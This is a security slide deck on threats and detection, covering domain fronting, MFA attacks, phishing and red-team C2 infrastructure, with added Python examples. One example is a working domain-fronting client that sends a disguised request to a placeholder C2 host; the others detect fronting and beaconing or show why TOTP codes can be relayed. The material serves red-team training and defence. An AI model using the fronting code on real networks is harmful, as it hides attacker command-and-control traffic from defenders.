Slide 1
Are you ready for a Cyber Tsunami?
A Practical Approach to Threats & Detection
Harman Singh @digitalamli
www.defendza.com @defendzaltd
Slide 2
What is the best place to hide a dead body? Page 2 of Google search results.
Slide 3
Evolution of the field of computer science
1945: Plankalkül ("Plan Calculus"). Konrad Zuse's design, generally counted as the first high-level programming language.
1967: ARPANET. Planning of the US ARPA network began; it later became the first network to run the TCP/IP suite (cut-over in 1983).
1970s: Personal computers. The Kenbak-1 sold for $750 and shifted about 40 units; the Micral N was the first commercial machine built around a microprocessor.
1973: Alto. Xerox PARC's Alto had a bitmapped screen and demonstrated the graphical user interface.
1990: WWW. Tim Berners-Lee created the World Wide Web at CERN, the laboratory in Switzerland.
Reference: www.bestchoiceschools.com
Slide 4
OT: Operational Technology
Systems for monitoring and controlling physical processes: ICS (industrial control systems), SCADA (supervisory control and data acquisition), DCS (distributed control systems), PLCs (programmable logic controllers), RTUs (remote terminal units) and CNC (computer numerical control) systems.
Slide 5
Industrial Internet: IT + OT, the factories of the future
Cyber security view: "Love is a temporary insanity curable by marriage."
Slide 6
Make of that what you will…
Slide 7
Tactics, Techniques & Procedures
Slide 8
Domain Fronting – Real World
• Basics: circumvent censorship restrictions. The TLS connection (SNI, certificate) appears to go to a permitted site hosted on a CDN, while the HTTP Host header routes the request to a different site on the same CDN.
Slide 9
Domain Fronting - Red Teaming Use Case
❑ Straightforward process to set up a domain front:
  o Define the C2 in a CDN distribution
  o The payload calls back to the 'good' CDN host
  o The CDN redirects the C2 traffic to the C2 server
  o Net effect: our payload calls back the 'good' CDN host, which redirects to the C2 server
❑ Cloud providers say it's 'disabled'; at the time of this talk it still worked. Several major CDNs have since blocked requests whose Host header does not match the SNI, so check your CDN's current behaviour before building an engagement on it.
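The mechanics of a domain front, as an added example that is not part of the original talk: the client negotiates TLS (SNI and certificate) against a permitted hostname on the CDN, while the HTTP Host header names the distribution that forwards to the C2. The blue-team check at the end flags exactly that disagreement in proxy records. The hostnames, the sample proxy records and the same-site tolerance rule are constructed assumptions; `send_fronted` needs network access and is not exercised offline, everything else runs as-is.

```python
"""Domain fronting: the TLS SNI carries one (allowed) hostname, the HTTP Host
header names the real backend behind the same CDN.  Added example, not code
from the talk.  All hostnames are placeholders (assumption), not real infra."""
import socket
import ssl

FRONT_HOST = "allowed-site.example.com"   # what the network sees: SNI and certificate
REAL_HOST = "payload-c2.example.net"      # CDN distribution that forwards to the C2


def build_fronted_request(front_host: str, real_host: str, path: str = "/") -> bytes:
    """Return the raw HTTP/1.1 request a fronted client sends.

    The TLS layer is negotiated against ``front_host`` (server_hostname / SNI);
    the CDN routes on the Host header, which names ``real_host``.
    """
    lines = [
        f"GET {path} HTTP/1.1",
        f"Host: {real_host}",
        "User-Agent: Mozilla/5.0",
        "Connection: close",
        "",
        "",
    ]
    return "\r\n".join(lines).encode("ascii")


def send_fronted(front_host: str, real_host: str, path: str = "/", timeout: float = 5.0) -> bytes:
    """Perform the fronted request over a real TLS connection (network access needed).

    Not invoked by the offline demonstration; shown for the SNI/Host split only.
    """
    ctx = ssl.create_default_context()
    with socket.create_connection((front_host, 443), timeout=timeout) as raw:
        # SNI and certificate validation target the front; Host names the backend.
        with ctx.wrap_socket(raw, server_hostname=front_host) as tls:
            tls.sendall(build_fronted_request(front_host, real_host, path))
            chunks = []
            while True:
                data = tls.recv(4096)
                if not data:
                    break
                chunks.append(data)
            return b"".join(chunks)


def host_header(request: bytes) -> str:
    """Extract the Host header value from a raw HTTP request (empty if absent)."""
    for line in request.decode("ascii", "replace").split("\r\n"):
        if line.lower().startswith("host:"):
            return line.split(":", 1)[1].strip()
    return ""


def fronting_suspects(records):
    """Blue-team check: flag flows whose HTTP Host differs from the TLS SNI.

    ``records`` are (sni, host) pairs as a TLS-inspecting proxy would log them.
    A mismatch within the same registrable domain (assumed two labels) is
    tolerated as ordinary CDN noise such as www vs cdn hostnames.
    """
    suspects = []
    for sni, host in records:
        if not (sni and host) or host.lower() == sni.lower():
            continue
        if host.lower().split(".")[-2:] != sni.lower().split(".")[-2:]:
            suspects.append((sni, host))
    return suspects


# Constructed sample: what a TLS-terminating proxy might record for three flows.
SAMPLE_FLOWS = [
    ("www.example.com", "www.example.com"),     # ordinary browsing
    (FRONT_HOST, REAL_HOST),                    # fronted: SNI and Host disagree
    ("cdn.example.org", "www.example.org"),     # same site, different label: benign
]

if __name__ == "__main__":
    print(build_fronted_request(FRONT_HOST, REAL_HOST, "/beacon").decode())
    print("suspect flows:", fronting_suspects(SAMPLE_FLOWS))
```

The detection side only works where the proxy can see the decrypted Host header (TLS inspection) or where the CDN itself logs it; on encrypted traffic alone the front looks like a normal visit to the permitted site, which is the whole point of the technique.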
Slide 10
Multi-Factor Authentication - Concepts
Factors: something you know, something you have, something you are (plus other factors)
Strength: single factor, two factor, multi-factor
Delivery: in-band auth vs out-of-band auth
Slide 11
Multi-Factor Authentication - Attacks
01 Social engineering: spear-phishing campaigns, for instance phishing from a spoofed LinkedIn-style domain.
02 Technology attacks: attacks on the technology underlying an MFA factor, such as SIM swapping or SS7 attacks to capture SMS codes.
03 Man-in-the-middle attacks: tricking the user into visiting a rogue website set up by the attacker, which relays the login and steals the resulting session token; that token carries no 2FA protection of its own.
04 Endpoint attacks: malicious software on the endpoint stealing information such as codes, or stealing cookies after authentication.
05 Compromised 2FA software: a more specialised technique using rogue software installation, such as drivers or smartcard-related software, to manipulate or replace the legitimate software.
06 Integrated assets: Active Directory / smartcard infrastructure, email hijacks.
Slide 12
Phishing Attack Lifecycle
1. EMAIL: phishing email containing a link to the spoofed page.
2. LOGIN: user is redirected to the spoofed login page and submits credentials.
3. HARVEST: credentials are captured and sent to the attacker's server.
4. DOWNLOAD: user is redirected to a file download prompt: 'Do you want to run SSOLogin?'
5. MAGIC HAPPENS: user selects the file and runs it.
6. C2 ESTABLISHED: connection established with the C2 servers.
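Why the man-in-the-middle attack (03 on the previous slide) and the phishing flow on this slide defeat one-time codes but not origin-bound authenticators, as an added example that is not part of the original talk: a TOTP code relayed within the server's time window is accepted from anywhere, because nothing in the code says where it was typed; an assertion computed over the origin the browser actually saw fails when the relying party checks it against its own origin. The TOTP and HOTP parts follow RFC 6238 / RFC 4226; the secrets, origins, nonce and the HMAC standing in for a public-key signature are constructed assumptions.

```python
"""Added example (not from the talk): a man-in-the-middle phishing site can relay
a TOTP code but cannot replay an origin-bound (FIDO-style) assertion.
Secrets, origins and the challenge below are constructed placeholders."""
import hashlib
import hmac
import struct

TOTP_STEP = 30  # seconds per code, RFC 6238 default


def totp(secret: bytes, timestamp: float, digits: int = 6, step: int = TOTP_STEP) -> str:
    """RFC 6238 TOTP on top of RFC 4226 HOTP (HMAC-SHA1, dynamic truncation)."""
    counter = int(timestamp // step)
    mac = hmac.new(secret, struct.pack(">Q", counter), hashlib.sha1).digest()
    offset = mac[-1] & 0x0F
    code = (struct.unpack(">I", mac[offset:offset + 4])[0] & 0x7FFFFFFF) % (10 ** digits)
    return f"{code:0{digits}d}"


def verify_totp(secret: bytes, code: str, timestamp: float, skew_steps: int = 1) -> bool:
    """Server-side check allowing +/- skew_steps windows.  Nothing here knows where
    the code was typed, so a code phished and relayed inside the window passes."""
    return any(
        hmac.compare_digest(totp(secret, timestamp + d * TOTP_STEP), code)
        for d in range(-skew_steps, skew_steps + 1)
    )


def authenticator_sign(device_key: bytes, challenge: bytes, seen_origin: str) -> bytes:
    """The authenticator (e.g. a security key) signs the challenge together with the
    origin the browser reports.  HMAC stands in for the real signature (assumption)."""
    return hmac.new(device_key, challenge + seen_origin.encode(), hashlib.sha256).digest()


def verify_origin_bound(device_key: bytes, challenge: bytes, assertion: bytes, rp_origin: str) -> bool:
    """The relying party recomputes over *its own* origin.  An assertion made while the
    user sat on the phishing origin never verifies, however fast it is relayed."""
    expected = hmac.new(device_key, challenge + rp_origin.encode(), hashlib.sha256).digest()
    return hmac.compare_digest(expected, assertion)


def mitm_phish(relay_delay: float, now: float) -> dict:
    """Simulate one attack: the victim enters a TOTP code and taps their key on the
    phishing site; the proxy forwards both to the real site relay_delay seconds later."""
    secret = b"constructed-totp-seed"          # shared TOTP seed (constructed)
    device_key = b"constructed-device-key"     # authenticator key (constructed)
    real_origin = "https://sso.example.com"
    phish_origin = "https://sso-example.com.login-portal.test"

    # Victim's browser, pointed at the phishing site:
    code = totp(secret, now)
    challenge = b"server-nonce-0001"           # nonce the real site issued, relayed by the proxy
    assertion = authenticator_sign(device_key, challenge, phish_origin)

    # Attacker relays both to the real service a little later:
    later = now + relay_delay
    return {
        "totp_accepted": verify_totp(secret, code, later),
        "fido_accepted": verify_origin_bound(device_key, challenge, assertion, real_origin),
    }


if __name__ == "__main__":
    print(mitm_phish(relay_delay=10.0, now=1_700_000_000.0))
```

The time window is the only thing protecting the TOTP path, and a relaying proxy operates in seconds; the origin binding is what removes the phishing site from the picture.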
Slide 13
Red Team Attack Overview
Diagram: attack infrastructure in the cloud (TS1, TS2, C2-1 behind a CDN, C2-2 over DNS, the Phish server) reaching the target organisation across the Internet. Flows shown: command and control traffic, the phishing link, Responder.
Legend:
TS1, TS2 – attack team servers
C2-1 – C2 using CDN
C2-2 – C2 using DNS
Phish – phish server
RSP – Responder
Slide 14
Security Problems
Slide 15
No frills…
Slide 16
Business Side
➢ Compliant but not secure
  ▪ Do the ground work; no shortcuts will work.
➢ Tick-box exercises
  ▪ Understand business objectives and map them to requirements.
➢ Golf course deals
  ▪ Decision making should consider technical product evaluations.
  ▪ Examples
Slide 17
Golf course deals - Example
Red Teaming isn't for everyone. STOP wasting your budgets.
Slide 18
(image only, no text)
Slide 19
Business Side
➢ Lack of …
  ▪ Stop cribbing; build a business case. If it's management's accountability, let them own it. If it's yours, you must do it right.
Last but not least, remember that:
LESS IS MORE (Robert Browning, 'Andrea del Sarto')
Slide 20
Vendor Side
Stop selling FUD. Sometimes it sells, sometimes it doesn't.
Slide 21
A lame attempt at indexing endless breaches….
A: Adobe - 38 million worldwide; Apple - 225,000 users worldwide
B: British Airways - 380,000 transactions; Butlin's - 34,000 guest records; Bupa - 547,000 customers worldwide, 43,000 in the UK; Bethesda - unknown
C: Cash Converters (2) - number affected not revealed; Cathay Pacific - 9.4 million people
D: Dixons Carphone (2) - 10 million customers' data; Deloitte
Slide 22
E: Equifax - 15.2 million; Evernote
F: Facebook - 50 million worldwide; Fortnum and Mason - 23,000
G: The Government - 25 million child benefit records; University of Greenwich - exposed the personal data of around 20,000 students
H: HSBC - undisclosed number of mortgage customers; HSBC - online banking (USA so far); Heathrow Airport
…. and so on
Source: https://community.monzo.com/t/the-hack-list/46880
Slide 23
The Practical 10 Pointer
Slide 24
Practical 10 Pointer Approach – 1/4
THREAT MODELLING
Essential component of a proactive, security-conscious web application estate.
• Loads and loads of SMEs are in this bracket: threat modelling should be integrative and agile, involving collaboration between security, development and operations teams.
• OWASP Threat Modelling is a good start.
SEGREGATION
Segregation is a must at code, network and privilege level.
• Network-level segregation between production and corporate.
• Segregation between where code is deployed and the staging environments.
SECURE CODING
Important to detect and prevent insecure coding practices.
• Deploy secure coding approaches that focus on detecting unsafe and insecure coding practices.
• Secure coding should be integrated into the development process regardless of the device or environment used while programming.
Slide 25
Practical 10 Pointer Approach – 2/4
SECURE INFRASTRUCTURE
Secure hardening configuration, validated using penetration testing and red-teaming-style exercises.
• Secure hardening practices across endpoints, server segments, networks, perimeter, etc.
• Penetration testing for validation purposes. E.g. the choice of AD-based protections is massive now.
• Makes it easier before going live or enrolling devices into the production environment.
SUPPLY CHAIN
Trusted partners of your business must be trusted using technical controls.
• Third-party supply chain hacks are everywhere.
• No tick in the box please! Enforce it via SLAs.
ACCESS MANAGEMENT
Privileged access management restricts access in a number of scenarios, such as stolen credentials or inside attackers.
• Privileged accounts should be more restrictive; practise what you preach for IT teams.
• Least-privilege principle along with a defence-in-depth approach.
Slide 26
Practical 10 Pointer Approach – 3/4
MALWARE PROTECTION
Establish anti-malware defences at the perimeter (if there is one) and at endpoint level.
• Produce relevant policies and establish anti-malware protections across the estate.
• Peripheral device usage restrictions.
• Go easy on shopping; more solutions like AppLocker.
INCIDENT MANAGEMENT
Have incident management plans along with periodic testing during testing times.
• Establish incident response and disaster recovery / backup capability.
• TEST. TEST. TEST!
• Provide training to staff and report criminal incidents to the authorities. Don't pay ransoms.
SECURITY AWARENESS
Awareness of cyber risks helps improve the weakest link in the cyber kill chain.
• Probably the weakest link in the cyber kill chain?
• Maintain continuous awareness and validation to review your ongoing projects.
• Ensure ground-level support by widening your approach beyond senior management buy-in.
Slide 27
Practical 10 Pointer Approach – 4/4
LOGGING & MONITORING
Log relevant events and monitor for anomalies to help reduce reaction time.
• Log what you need, not what seems right.
• Ensure logs are centralised, or held on separate segments/devices from the primary assets.
• Monitoring is possible with good logging combined with an analysis job, to ensure anomalies are caught in time. CONTINUOUSLY!
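One concrete analysis job of the kind this slide calls for, as an added example that is not part of the original talk: implants such as the CDN-fronted C2 in the red team overview check in on a timer, so grouping proxy records by client and destination and measuring the spread of the inter-connection intervals separates machine regularity from human browsing. The Squid-like log format, every log line and the thresholds are constructed assumptions; tune the jitter ratio against your own traffic before alerting on it.

```python
"""Added example (not from the talk): spotting C2 beaconing in proxy logs from the
regularity of connection timing per client/destination pair.
Log lines are constructed, Squid-like records:  epoch_ts  client_ip  dest_host"""
import statistics
from collections import defaultdict

# Constructed sample log.  'cdn-files.example.net' plays the CDN-fronted C2 host;
# the other destinations are a user browsing.  One malformed line is included.
SAMPLE_LOG = """\
1700000000.10 10.0.0.5 www.example.com
1700000060.02 10.0.0.5 cdn-files.example.net
1700000061.90 10.0.0.5 news.example.org
1700000120.05 10.0.0.5 cdn-files.example.net
1700000133.40 10.0.0.5 www.example.com
1700000137.80 10.0.0.5 www.example.com
1700000180.01 10.0.0.5 cdn-files.example.net
1700000240.07 10.0.0.5 cdn-files.example.net
1700000255.00 10.0.0.5 mail.example.com
1700000300.03 10.0.0.5 cdn-files.example.net
1700000301.00 10.0.0.9 www.example.com
1700000301.50 10.0.0.5 www.example.com
1700000360.04 10.0.0.5 cdn-files.example.net
1700000390.00 10.0.0.5 news.example.org
1700000412.20 10.0.0.5 www.example.com
1700000420.06 10.0.0.5 cdn-files.example.net
not a valid line
"""


def parse_log(text):
    """Yield (timestamp, client, dest) tuples, skipping malformed lines."""
    for line in text.splitlines():
        parts = line.split()
        if len(parts) != 3:
            continue
        try:
            yield float(parts[0]), parts[1], parts[2]
        except ValueError:
            continue


def intervals_by_pair(records):
    """Group by (client, dest) and return the sorted inter-connection intervals."""
    times = defaultdict(list)
    for ts, client, dest in records:
        times[(client, dest)].append(ts)
    out = {}
    for pair, ts_list in times.items():
        ts_list.sort()
        out[pair] = [later - earlier for earlier, later in zip(ts_list, ts_list[1:])]
    return out


def find_beacons(text, min_connections=5, max_jitter_ratio=0.05):
    """Flag pairs with at least min_connections whose interval spread
    (population stdev / mean) is below max_jitter_ratio: machines keep time,
    people do not.  Returns {(client, dest): (mean_interval, jitter_ratio)}."""
    hits = {}
    for pair, gaps in intervals_by_pair(parse_log(text)).items():
        if len(gaps) + 1 < min_connections:
            continue                          # too few observations to judge
        mean = statistics.fmean(gaps)
        jitter = statistics.pstdev(gaps) / mean if mean else 0.0
        if jitter <= max_jitter_ratio:
            hits[pair] = (round(mean, 2), round(jitter, 4))
    return hits


if __name__ == "__main__":
    for (client, dest), (mean, jitter) in find_beacons(SAMPLE_LOG).items():
        print(f"{client} -> {dest}: every ~{mean}s, jitter ratio {jitter}")
```

Real implants add jitter and sleep variation to blunt exactly this check, so the ratio threshold is a starting point rather than a rule; the more durable signal is that the same destination keeps reappearing at a steady cadence across days, which the same grouping exposes once logs are centralised and retained.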
Slide 28
The following useful guides are available for free:
✓ Buyer's guide to security
✓ 10 Pointer Risk Management
✓ Security Awareness Image Quotes
Drop an email to the address below:
EMAIL: [email protected]
ADDRESS: Innovation Forum, 51 Frederick Road, Salford M6 6FP
PHONE: +0203 916 5444 / +161 743 3495-97
Twitter: @defendzaltd
WEB: www.defendza.com (under construction)